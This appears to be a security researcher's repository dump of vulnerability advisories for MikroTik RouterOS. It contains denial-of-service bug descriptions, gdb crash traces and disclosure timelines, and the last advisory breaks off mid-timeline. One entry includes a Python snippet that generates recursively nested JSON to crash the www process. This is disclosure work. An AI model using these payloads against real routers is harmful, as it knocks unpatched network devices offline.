├── LICENSE ├── README.md ├── advisory ├── MikroTik │ ├── CVE-2019-13954 │ │ └── README.md │ ├── CVE-2019-13955 │ │ └── README.md │ ├── CVE-2020-20211 │ │ └── README.md │ ├── CVE-2020-20212 │ │ └── README.md │ ├── CVE-2020-20213 │ │ └── README.md │ ├── CVE-2020-20214 │ │ └── README.md │ ├── CVE-2020-20215 │ │ └── README.md │ ├── CVE-2020-20216 │ │ └── README.md │ ├── CVE-2020-20217 │ │ ├── README.md │ │ └── images │ │ │ └── route_high_cpu_load.png │ ├── CVE-2020-20218 │ │ └── README.md │ ├── CVE-2020-20219 │ │ └── README.md │ ├── CVE-2020-20220 │ │ └── README.md │ ├── CVE-2020-20221 │ │ ├── README.md │ │ └── images │ │ │ └── cerm_high_cpu_load.png │ ├── CVE-2020-20222 │ │ └── README.md │ ├── CVE-2020-20225 │ │ └── README.md │ ├── CVE-2020-20227 │ │ └── README.md │ ├── CVE-2020-20230 │ │ ├── README.md │ │ └── images │ │ │ └── sshd_high_cpu_load.png │ ├── CVE-2020-20231 │ │ └── README.md │ ├── CVE-2020-20236 │ │ └── README.md │ ├── CVE-2020-20237 │ │ └── README.md │ ├── CVE-2020-20245 │ │ └── README.md │ ├── CVE-2020-20246 │ │ └── README.md │ ├── CVE-2020-20248 │ │ ├── README.md │ │ └── images │ │ │ └── memtest_high_cpu_load.png │ ├── CVE-2020-20249 │ │ └── README.md │ ├── CVE-2020-20250 │ │ └── README.md │ ├── CVE-2020-20252 │ │ └── README.md │ ├── CVE-2020-20253 │ │ └── README.md │ ├── CVE-2020-20254 │ │ └── README.md │ ├── CVE-2020-20262 │ │ └── README.md │ ├── CVE-2020-20264 │ │ └── README.md │ ├── CVE-2020-20265 │ │ └── README.md │ ├── CVE-2020-20266 │ │ └── README.md │ ├── CVE-2020-20267 │ │ └── README.md │ ├── CVE-2021-36613 │ │ └── README.md │ ├── CVE-2021-36614 │ │ └── README.md │ ├── CVE-2022-36522 │ │ └── README.md │ ├── CVE-2022-45313 │ │ └── README.md │ ├── CVE-2022-45315 │ │ └── README.md │ ├── vul_hotspot_2 │ │ └── README.md │ ├── vul_smb_1 │ │ ├── README.md │ │ └── poc.py │ ├── vul_smb_2 │ │ ├── README.md │ │ └── poc.py │ └── vul_smb_3 │ │ ├── README.md │ │ └── poc.py └── Other │ └── freebsd_rtsold_out_of_bounds_read │ ├── README.md │ └── poc.py ├── scripts └── Synology │ └── syno_finder │ ├── README.md │ ├── images │ └── syno_finder_sample.png │ ├── syno_finder.lua │ └── synology_finder.pcap └── slides ├── EU-22-Chen-LCDPwn-Breaking-Enterprise.pdf ├── EU-23-Quan-Breaking-Theoretical-Limits.pdf ├── HITB2021AMS-A_Journey_into_Synology_NAS.pdf ├── POC2019-Bug_Hunting_in_Synology_NAS.pdf └── POC2022-MikroTik_RouterOS_Security-The_Forgotten_IPC_Message.pdf /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2020, cq674350529 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | 1. Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | 2. Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | 3. Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Sharing my advisory, poc, slides and scripts to IoT / protocol security. You can find me at: 2 | 3 | + Medium: [https://medium.com/@cq674350529](https://medium.com/@cq674350529) 4 | 5 | + Blog: [https://cq674350529.github.io/](https://cq674350529.github.io/) 6 | + Mail: [cq674350529@163.com](mailto:cq674350529@163.org) 7 | + Twitter: [@cq674350529](https://twitter.com/cq674350529) 8 | 9 | ### Slides 10 | 11 | + BHEU2023: [Breaking Theoretical Limits: The Gap Between Virtual NICs and Physical Network Cards](http://i.blackhat.com/EU-23/Presentations/EU-23-Quan-Breaking-Theoretical-Limits_REV2.pdf) *(cooperated)* 12 | 13 | + BHEU2022: [LCDPwn: Breaking Enterprise-Things with Layer 2 Discovery Protocol Vulnerabilities Again](slides/EU-22-Chen-LCDPwn-Breaking-Enterprise.pdf)  ([video](https://www.youtube.com/watch?v=qIwKg2qny0c)) 14 | + [(website) LCDPwn](https://cq674350529.github.io/lcdpwn/) 15 | 16 | + POC2022: [MikroTik RouterOS Security: The Forgotten IPC Message](slides/POC2022-MikroTik_RouterOS_Security-The_Forgotten_IPC_Message.pdf)  ([video](https://www.youtube.com/watch?v=fkigIlDe6vs)) 17 | + HITB2021AMS: [A Journey into Synology NAS](slides/HITB2021AMS-A_Journey_into_Synology_NAS.pdf)  ([video](https://www.youtube.com/watch?v=XGmzeM2IEB4)) 18 | + [(blog) A Journey into Synology NAS 系列一: 群晖NAS介绍](https://cq674350529.github.io/2021/08/30/A-Journey-into-Synology-NAS-%E7%B3%BB%E5%88%97%E4%B8%80-%E7%BE%A4%E6%99%96NAS%E4%BB%8B%E7%BB%8D/) 19 | + [(blog) A Journey into Synology NAS 系列二: findhostd服务分析](https://cq674350529.github.io/2021/09/12/A-Journey-into-Synology-NAS-%E7%B3%BB%E5%88%97%E4%BA%8C-findhostd%E6%9C%8D%E5%8A%A1%E5%88%86%E6%9E%90/) 20 | + [(blog) A Journey into Synology NAS 系列三: iscsi_snapshot_comm_core服务分析](https://cq674350529.github.io/2021/12/25/A-Journey-into-Synology-NAS-%E7%B3%BB%E5%88%97%E4%B8%89-iscsi_snapshot_comm_core%E6%9C%8D%E5%8A%A1%E5%88%86%E6%9E%90/) 21 | + [(blog) A Journey into Synology NAS 系列四: HTTP请求流程和案例分析](https://cq674350529.github.io/2022/01/22/A-Journey-into-Synology-NAS-%E7%B3%BB%E5%88%97%E5%9B%9B-HTTP%E8%AF%B7%E6%B1%82%E6%B5%81%E7%A8%8B%E5%92%8C%E6%A1%88%E4%BE%8B%E5%88%86%E6%9E%90/) 22 | + POC2019: [Bug Hunting in Synology NAS](slides/POC2019-Bug_Hunting_in_Synology_NAS.pdf) 23 | 24 | ### Advisory 25 | 26 | #### Protocol 27 | 28 | + [FreeBSD rtsold Out of Bounds Read Vulnerability](advisory/Other/freebsd_rtsold_out_of_bounds_read) 29 | 30 | ### Scripts 31 | 32 | + [syno_finder](scripts/Synology/syno_finder): a wireshark plugin to disassemble the Synology finder protocol (9999/udp) 33 | 34 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2019-13954/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2019-13954 2 | 3 | #### Description 4 | 5 | The `www` process suffers from a memory exhaustion vulnerability. By sending a crafted `POST` request to `/jsproxy/upload`, an authenticated remote user can cause the `www` binary to consume all memory. 6 | 7 | When testing the proof of concept on an x86 RouterOS VM, this vulnerability didn't just crash `www` but caused the whole system to reboot. 8 | 9 | The poc is available at [CVE-2019-13954](https://github.com/tenable/routeros/tree/master/poc/cve_2019_13954/src/main.cpp). 10 | 11 | #### Affected Version 12 | 13 | This vulnerability was initially found in long-term `6.42.11`, and was fixed since stable `6.45.1`. 14 | 15 | ### References 16 | 17 | + [Two vulnerabilities found in MikroTik's RouterOS](https://seclists.org/fulldisclosure/2019/Jul/20) 18 | + [CVE-2019-13954](https://github.com/tenable/routeros/tree/master/poc/cve_2019_13954) 19 | + [routeros](https://github.com/tenable/routeros) 20 | + [MikroTik RouterOS漏洞CVE-2019-13954分析](https://cq674350529.github.io/2019/08/23/MikroTik-RouterOS%E6%BC%8F%E6%B4%9ECVE-2019-13954%E5%88%86%E6%9E%90/) 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2019-13955/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2019-13955 2 | 3 | #### Description 4 | 5 | The `www` process suffers from a stack exhaustion vulnerability. By sending a crafted packet to the `www` process, an unauthenticated remote user can trigger a stack exhaustion vulnerability via recursive parsing of `JSON` containing message type M. 6 | 7 | Based on the [`routeros`](https://github.com/tenable/routeros) repository, the main part of crafted message can be generated with a simple python code snippet. 8 | 9 | ```python 10 | msg = "{M01:[M01:[]]}" 11 | for _ in xrange(2000): 12 | msg = msg.replace('[]', "[M01:[]]") 13 | ``` 14 | 15 | Against long-term `6.43.16`, the poc resulted in the following crash captured by `gdb`. 16 | 17 | ```shell 18 | (gdb) c 19 | Continuing. 20 | Reading /nova/lib/www/jsproxy.p from remote target... 21 | Reading /lib/libucrypto.so from remote target... 22 | [New Thread 279.366] 23 | 24 | Thread 2 "www" received signal SIGSEGV, Segmentation fault. 25 | [Switching to Thread 279.366] 26 | => 0x7746792f: call 0x774661a9 27 | 0x77467934: add ebx,0x5028 28 | 0x7746793a: mov DWORD PTR [ebp-0x3c],eax 29 | 0x7746793d: mov DWORD PTR [ebp-0x44],edx 30 | 0x7746792f in ?? () from target:/nova/lib/www/jsproxy.p 31 | (gdb) info inferiors 32 | Num Description Executable 33 | * 1 process 279 target:/nova/bin/www 34 | (gdb) bt 35 | #0 0x7746792f in ?? () from target:/nova/lib/www/jsproxy.p 36 | #1 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p 37 | #2 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p 38 | #3 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p 39 | #4 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p 40 | #5 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p 41 | #6 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p 42 | #7 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p 43 | #8 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p 44 | #9 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p 45 | #10 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p 46 | #11 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p 47 | #12 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p 48 | #13 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p 49 | #14 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p 50 | #15 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p 51 | #16 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p 52 | #17 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p 53 | #18 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p 54 | #19 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p 55 | #20 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p 56 | #21 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p 57 | #22 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p 58 | #23 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p 59 | #24 0x774682a3 in ?? () from target:/nova/lib/www/jsproxy.p 60 | ... 61 | ``` 62 | 63 | The poc is available at [CVE-2019-13955](https://github.com/tenable/routeros/blob/master/poc/cve_2019_13955/src/main.cpp). 64 | 65 | #### Affected Version 66 | 67 | This vulnerability was initially found in long-term `6.42.11`, and was fixed since stable `6.45.1`. 68 | 69 | ### References 70 | 71 | + [Two vulnerabilities found in MikroTik's RouterOS](https://seclists.org/fulldisclosure/2019/Jul/20) 72 | + [CVE-2019-13955](https://github.com/tenable/routeros/tree/master/poc/cve_2019_13955) 73 | + [routeros](https://github.com/tenable/routeros) 74 | + [CVE-2018-1158 MikroTik RouterOS漏洞分析之发现CVE-2019-13955](https://cq674350529.github.io/2019/08/15/CVE-2018-1158-MikroTik-RouterOS%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B9%8B%E5%8F%91%E7%8E%B0CVE-2019-13955/) 75 | 76 | 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20211/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20211 2 | 3 | #### Description 4 | 5 | The `console` process suffers from an assertion failure vulnerability. There is a reachable assertion in the console process. By sending a crafted packet, an authenticated remote user can crash the `console` process due to assertion failure. 6 | 7 | Against stable `6.46.3`, the poc resulted in the following crash captured by `gdb`. 8 | 9 | ```shell 10 | (gdb) c 11 | Continuing. 12 | 13 | Program received signal SIGABRT, Aborted. 14 | => 0x7775255b : pop ebx 15 | 0x7775255c : cmp eax,0xfffff000 16 | 0x77752561 : jbe 0x77752571 17 | 0x77752563 : mov edx,DWORD PTR [ebx-0x34] 18 | 0x7775255b in raise () from target:/lib/libc.so.0 19 | (gdb) i r 20 | eax 0x0 0 21 | ecx 0x105 261 22 | edx 0x6 6 23 | ebx 0x105 261 24 | esp 0x7fe69288 0x7fe69288 25 | ebp 0x7fe69290 0x7fe69290 26 | esi 0x7775a200 2004197888 27 | edi 0x0 0 28 | eip 0x7775255b 0x7775255b 29 | eflags 0x246 [ PF ZF IF ] 30 | cs 0x73 115 31 | ss 0x7b 123 32 | ds 0x7b 123 33 | es 0x7b 123 34 | fs 0x0 0 35 | gs 0x33 51 36 | (gdb) info inferiors 37 | Num Description Executable 38 | * 1 process 261 target:/nova/bin/console 39 | ``` 40 | 41 | And the crash dump in `/rw/logs/backtrace.log` was: 42 | 43 | ```shell 44 | # cat /rw/logs/backtrace.log 45 | 2020.05.16-21:19:30.73@0: 46 | 2020.05.16-21:19:30.73@0: 47 | 2020.05.16-21:19:30.74@0: /nova/bin/console 48 | 2020.05.16-21:19:30.74@0: --- signal=6 -------------------------------------------- 49 | 2020.05.16-21:19:30.74@0: 50 | 2020.05.16-21:19:30.74@0: eip=0x7775255b eflags=0x00000246 51 | 2020.05.16-21:19:30.74@0: edi=0x00000000 esi=0x7775a200 ebp=0x7fe69290 esp=0x7fe69288 52 | 2020.05.16-21:19:30.74@0: eax=0x00000000 ebx=0x00000105 ecx=0x00000105 edx=0x00000006 53 | 2020.05.16-21:19:30.74@0: 54 | 2020.05.16-21:19:30.74@0: maps: 55 | 2020.05.16-21:19:30.74@0: 08048000-080bd000 r-xp 00000000 00:0c 1036 /nova/bin/console 56 | 2020.05.16-21:19:30.74@0: 77724000-77759000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 57 | 2020.05.16-21:19:30.74@0: 7775d000-77777000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 58 | 2020.05.16-21:19:30.74@0: 77778000-77787000 r-xp 00000000 00:0c 944 /lib/libuc++.so 59 | 2020.05.16-21:19:30.74@0: 77788000-7778e000 r-xp 00000000 00:0c 949 /lib/libufiber.so 60 | 2020.05.16-21:19:30.74@0: 7778f000-777db000 r-xp 00000000 00:0c 946 /lib/libumsg.so 61 | 2020.05.16-21:19:30.74@0: 777e1000-777e8000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 62 | 2020.05.16-21:19:30.74@0: 63 | 2020.05.16-21:19:30.74@0: stack: 0x7fe6a000 - 0x7fe69288 64 | 2020.05.16-21:19:30.74@0: 00 a0 75 77 00 a0 75 77 c8 92 e6 7f 77 e0 74 77 06 00 00 00 00 a2 75 77 20 00 00 00 00 00 00 00 65 | 2020.05.16-21:19:30.74@0: 0c 93 e6 7f 28 93 e6 7f c4 92 e6 7f e4 ba 7d 77 01 00 00 00 e4 ba 7d 77 0c 93 e6 7f 00 00 00 00 66 | 2020.05.16-21:19:30.74@0: 67 | 2020.05.16-21:19:30.74@0: code: 0x7775255b 68 | 2020.05.16-21:19:30.74@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7 d8 69 | 2020.05.16-21:19:30.74@0: 70 | ``` 71 | 72 | #### Affected Version 73 | 74 | This vulnerability was initially found in long-term `6.44.5`. It seems that the latest stable version `6.46.5` still suffers from this vulnerability. 75 | 76 | #### Timeline 77 | 78 | + 2019/08/23 - report the vulnerability to the vendor 79 | + 2019/08/30 - vendor confirms the vulnerability and will fix it as soon as possible 80 | + 2020/04/14 - still no fix yet 81 | + 2021/05/04 - CVE is assigned 82 | 83 | 84 | 85 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20212/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20212 2 | 3 | #### Description 4 | 5 | The `console` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `console` process due to NULL pointer dereference. 6 | 7 | Against stable `6.46.3`, the poc resulted in the following crash captured by `gdb`. 8 | 9 | ```shell 10 | (gdb) c 11 | Continuing. 12 | 13 | Program received signal SIGSEGV, Segmentation fault. 14 | => 0x776d8cd9 <_ZN6stringC2ERKS_+21>: mov eax,DWORD PTR [eax] 15 | 0x776d8cdb <_ZN6stringC2ERKS_+23>: mov edx,DWORD PTR [eax] 16 | 0x776d8cdd <_ZN6stringC2ERKS_+25>: add edx,eax 17 | 0x776d8cdf <_ZN6stringC2ERKS_+27>: add edx,0x4 18 | 0x776d8cd9 in string::string(string const&) () from target:/lib/libuc++.so 19 | (gdb) i r 20 | eax 0x0 0 21 | ecx 0x0 0 22 | edx 0x80c2ef0 135016176 23 | ebx 0x776e14ec 2003703020 24 | esp 0x7f8e59ec 0x7f8e59ec 25 | ebp 0x7f8e59f8 0x7f8e59f8 26 | esi 0x80d87a4 135104420 27 | edi 0x7f8e5a58 2140035672 28 | eip 0x776d8cd9 0x776d8cd9 29 | eflags 0x10202 [ IF RF ] 30 | cs 0x73 115 31 | ss 0x7b 123 32 | ds 0x7b 123 33 | es 0x7b 123 34 | fs 0x0 0 35 | gs 0x33 51 36 | (gdb) info inferiors 37 | Num Description Executable 38 | * 1 process 180 target:/nova/bin/console 39 | ``` 40 | 41 | And the crash dump in `/rw/logs/backtrace.log` was: 42 | 43 | ```shell 44 | # cat /rw/logs/backtrace.log 45 | 2020.05.16-20:52:17.11@0: 46 | 2020.05.16-20:52:17.11@0: 47 | 2020.05.16-20:52:17.11@0: /nova/bin/console 48 | 2020.05.16-20:52:17.11@0: --- signal=11 -------------------------------------------- 49 | 2020.05.16-20:52:17.11@0: 50 | 2020.05.16-20:52:17.11@0: eip=0x776d8cd9 eflags=0x00010202 51 | 2020.05.16-20:52:17.11@0: edi=0x7f8e5a58 esi=0x080d87a4 ebp=0x7f8e59f8 esp=0x7f8e59ec 52 | 2020.05.16-20:52:17.11@0: eax=0x00000000 ebx=0x776e14ec ecx=0x00000000 edx=0x080c2ef0 53 | 2020.05.16-20:52:17.11@0: 54 | 2020.05.16-20:52:17.11@0: maps: 55 | 2020.05.16-20:52:17.11@0: 08048000-080bd000 r-xp 00000000 00:0c 1036 /nova/bin/console 56 | 2020.05.16-20:52:17.11@0: 7767e000-776b3000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 57 | 2020.05.16-20:52:17.11@0: 776b7000-776d1000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 58 | 2020.05.16-20:52:17.11@0: 776d2000-776e1000 r-xp 00000000 00:0c 944 /lib/libuc++.so 59 | 2020.05.16-20:52:17.11@0: 776e2000-776e8000 r-xp 00000000 00:0c 949 /lib/libufiber.so 60 | 2020.05.16-20:52:17.11@0: 776e9000-77735000 r-xp 00000000 00:0c 946 /lib/libumsg.so 61 | 2020.05.16-20:52:17.11@0: 7773b000-77742000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 62 | 2020.05.16-20:52:17.11@0: 63 | 2020.05.16-20:52:17.11@0: stack: 0x7f8e6000 - 0x7f8e59ec 64 | 2020.05.16-20:52:17.11@0: c4 41 0c 08 01 00 00 00 c4 41 0c 08 28 5a 8e 7f f2 74 05 08 50 5a 8e 7f 00 00 00 00 01 00 00 00 65 | 2020.05.16-20:52:17.11@0: 04 00 00 00 c4 41 0c 08 02 00 ff 88 58 5a 8e 7f 50 5a 8e 7f a4 87 0d 08 58 5a 8e 7f 78 5a 8e 7f 66 | 2020.05.16-20:52:17.11@0: 67 | 2020.05.16-20:52:17.11@0: code: 0x776d8cd9 68 | 2020.05.16-20:52:17.11@0: 8b 00 8b 10 01 c2 83 c2 04 52 83 c0 04 50 ff 75 69 | ``` 70 | 71 | #### Affected Version 72 | 73 | This vulnerability was initially found in long-term `6.44.5`. It seems that the latest stable version `6.46.5` still suffers from this vulnerability. 74 | 75 | #### Timeline 76 | 77 | + 2019/08/26 - report the vulnerability to the vendor 78 | + 2019/08/28 - vendor confirms the vulnerability and will fix it as soon as possible 79 | + 2020/04/14 - still no fix yet 80 | + 2021/05/04 - CVE is assigned 81 | 82 | 83 | 84 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20213/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20213 2 | 3 | #### Description 4 | 5 | The `net` process suffers from a stack exhaustion vulnerability. By sending a crafted packet to the `net` process, an authenticated remote user can trigger a stack exhaustion vulnerability via recursive function calls. 6 | 7 | When testing the proof of concept on an x86 RouterOS VM, this vulnerability didn't just crash `net` process but caused the whole system to reboot. 8 | 9 | Against stable `6.46.5`, the poc resulted in the following crash captured by `gdb`. 10 | 11 | ```shell 12 | (gdb) c 13 | Continuing. 14 | 15 | Program received signal SIGSEGV, Segmentation fault. 16 | => 0x809ec65: push eax 17 | 0x809ec66: push esi 18 | 0x809ec67: push DWORD PTR [ebp+0xc] 19 | 0x809ec6a: push edi 20 | 0x0809ec65 in ?? () 21 | (gdb) i r 22 | eax 0xfe0008 16646152 23 | ecx 0x7772cae4 2004011748 24 | edx 0x8122630 135407152 25 | ebx 0x7772cae4 2004011748 26 | esp 0x7f310fe0 0x7f310fe0 27 | ebp 0x7f311018 0x7f311018 28 | esi 0x7fb0ff48 2142306120 29 | edi 0x7fb0fe4c 2142305868 30 | eip 0x809ec65 0x809ec65 31 | eflags 0x10206 [ PF IF RF ] 32 | cs 0x73 115 33 | ss 0x7b 123 34 | ds 0x7b 123 35 | es 0x7b 123 36 | fs 0x0 0 37 | gs 0x33 51 38 | (gdb) info inferiors 39 | Num Description Executable 40 | * 1 process 106 target:/nova/bin/net 41 | (gdb) info proc mappings 42 | process 106 43 | Mapped address spaces: 44 | 45 | Start Addr End Addr Size Offset objfile 46 | 0x8048000 0x8121000 0xd9000 0x0 /nova/bin/net 47 | 0x8121000 0x8123000 0x2000 0xd8000 /nova/bin/net 48 | 0x8123000 0x8152000 0x2f000 0x0 [heap] 49 | 0x77634000 0x77644000 0x10000 0x0 socket:[825] 50 | 0x77644000 0x77654000 0x10000 0x0 socket:[824] 51 | 0x77654000 0x77689000 0x35000 0x0 /lib/libuClibc-0.9.33.2.so 52 | 0x77689000 0x7768a000 0x1000 0x35000 /lib/libuClibc-0.9.33.2.so 53 | 0x7768a000 0x7768b000 0x1000 0x36000 /lib/libuClibc-0.9.33.2.so 54 | 0x7768b000 0x7768d000 0x2000 0x0 55 | 0x7768d000 0x776a7000 0x1a000 0x0 /lib/libgcc_s.so.1 56 | 0x776a7000 0x776a8000 0x1000 0x19000 /lib/libgcc_s.so.1 57 | 0x776a8000 0x776b7000 0xf000 0x0 /lib/libuc++.so 58 | 0x776b7000 0x776b8000 0x1000 0xf000 /lib/libuc++.so 59 | 0x776b8000 0x776c6000 0xe000 0x0 /lib/libz.so 60 | 0x776c6000 0x776c7000 0x1000 0xe000 /lib/libz.so 61 | 0x776c7000 0x776d1000 0xa000 0x0 /lib/libm-0.9.33.2.so 62 | 0x776d1000 0x776d2000 0x1000 0xa000 /lib/libm-0.9.33.2.so 63 | 0x776d2000 0x776d3000 0x1000 0xb000 /lib/libm-0.9.33.2.so 64 | 0x776d3000 0x776db000 0x8000 0x0 /lib/libubox.so 65 | 0x776db000 0x776dc000 0x1000 0x7000 /lib/libubox.so 66 | 0x776dc000 0x776df000 0x3000 0x0 /lib/libuxml++.so 67 | 0x776df000 0x776e0000 0x1000 0x2000 /lib/libuxml++.so 68 | 0x776e0000 0x7772c000 0x4c000 0x0 /lib/libumsg.so 69 | 0x7772c000 0x7772e000 0x2000 0x4c000 /lib/libumsg.so 70 | 0x7772e000 0x7772f000 0x1000 0x0 71 | 0x7772f000 0x7774c000 0x1d000 0x0 /lib/libucrypto.so 72 | 0x7774c000 0x7774d000 0x1000 0x1d000 /lib/libucrypto.so 73 | 0x7774e000 0x77750000 0x2000 0x0 74 | 0x77750000 0x77757000 0x7000 0x0 /lib/ld-uClibc-0.9.33.2.so 75 | 0x77757000 0x77758000 0x1000 0x6000 /lib/ld-uClibc-0.9.33.2.so 76 | 0x77758000 0x77759000 0x1000 0x7000 /lib/ld-uClibc-0.9.33.2.so 77 | 0x7f312000 0x7fb11000 0x7ff000 0x0 [stack] 78 | 0xffffe000 0xfffff000 0x1000 0x0 [vdso] 79 | (gdb) x/10wx $esp 80 | 0x7f310fe0: Cannot access memory at address 0x7f310fe0 81 | (gdb) bt 82 | #0 0x0809ec65 in ?? () 83 | #1 0x0809ec70 in ?? () 84 | #2 0x0809ec70 in ?? () 85 | #3 0x0809ec70 in ?? () 86 | #4 0x0809ec70 in ?? () 87 | #5 0x0809ec70 in ?? () 88 | #6 0x0809ec70 in ?? () 89 | #7 0x0809ec70 in ?? () 90 | #8 0x0809ec70 in ?? () 91 | #9 0x0809ec70 in ?? () 92 | #10 0x0809ec70 in ?? () 93 | #11 0x0809ec70 in ?? () 94 | #12 0x0809ec70 in ?? () 95 | #13 0x0809ec70 in ?? () 96 | #14 0x0809ec70 in ?? () 97 | #15 0x0809ec70 in ?? () 98 | #16 0x0809ec70 in ?? () 99 | #17 0x0809ec70 in ?? () 100 | #18 0x0809ec70 in ?? () 101 | #19 0x0809ec70 in ?? () 102 | #20 0x0809ec70 in ?? () 103 | #21 0x0809ec70 in ?? () 104 | #22 0x0809ec70 in ?? () 105 | #23 0x0809ec70 in ?? () 106 | # ... 107 | ``` 108 | 109 | And the crash dump in `/rw/logs/backtrace.log` was: 110 | 111 | ```shell 112 | # cat /rw/logs/backtrace.log 113 | 2020.06.08-11:19:45.40@0: 114 | 2020.06.08-11:19:45.40@0: 115 | 2020.06.08-11:19:45.40@0: /nova/bin/net 116 | 2020.06.08-11:19:45.40@0: --- signal=11 -------------------------------------------- 117 | 2020.06.08-11:19:45.40@0: 118 | 2020.06.08-11:19:45.40@0: eip=0x0809ec65 eflags=0x00010206 119 | 2020.06.08-11:19:45.40@0: edi=0x7fb0fe4c esi=0x7fb0ff48 ebp=0x7f311018 esp=0x7f310fe0 120 | 2020.06.08-11:19:45.40@0: eax=0x00fe0008 ebx=0x7772cae4 ecx=0x7772cae4 edx=0x08122630 121 | 2020.06.08-11:19:45.40@0: 122 | 2020.06.08-11:19:45.40@0: maps: 123 | 2020.06.08-11:19:45.40@0: 08048000-08121000 r-xp 00000000 00:0c 1004 /nova/bin/net 124 | 2020.06.08-11:19:45.40@0: 77654000-77689000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 125 | 2020.06.08-11:19:45.40@0: 7768d000-776a7000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 126 | 2020.06.08-11:19:45.40@0: 776a8000-776b7000 r-xp 00000000 00:0c 944 /lib/libuc++.so 127 | 2020.06.08-11:19:45.40@0: 776b8000-776c6000 r-xp 00000000 00:0c 945 /lib/libz.so 128 | 2020.06.08-11:19:45.40@0: 776c7000-776d1000 r-xp 00000000 00:0c 961 /lib/libm-0.9.33.2.so 129 | 2020.06.08-11:19:45.40@0: 776d3000-776db000 r-xp 00000000 00:0c 950 /lib/libubox.so 130 | 2020.06.08-11:19:45.40@0: 776dc000-776df000 r-xp 00000000 00:0c 948 /lib/libuxml++.so 131 | 2020.06.08-11:19:45.40@0: 776e0000-7772c000 r-xp 00000000 00:0c 946 /lib/libumsg.so 132 | 2020.06.08-11:19:45.40@0: 7772f000-7774c000 r-xp 00000000 00:0c 947 /lib/libucrypto.so 133 | 2020.06.08-11:19:45.40@0: 77750000-77757000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 134 | 2020.06.08-11:19:45.40@0: 135 | 2020.06.08-11:19:45.40@0: stack: 0x7fb10000 - 0x7f310fe0 136 | ``` 137 | 138 | #### Affected Version 139 | 140 | This vulnerability was initially found in long-term `6.44.5`, and was fixed in stable `6.47`. 141 | 142 | #### Timeline 143 | 144 | + 2019/09/16 - report the vulnerability to the vendor 145 | + 2019/09/17 - vendor confirms the vulnerability and will fix it as soon as possible 146 | + 2020/06/02 - vendor fix it in stable `6.47` 147 | + 2021/05/04 - 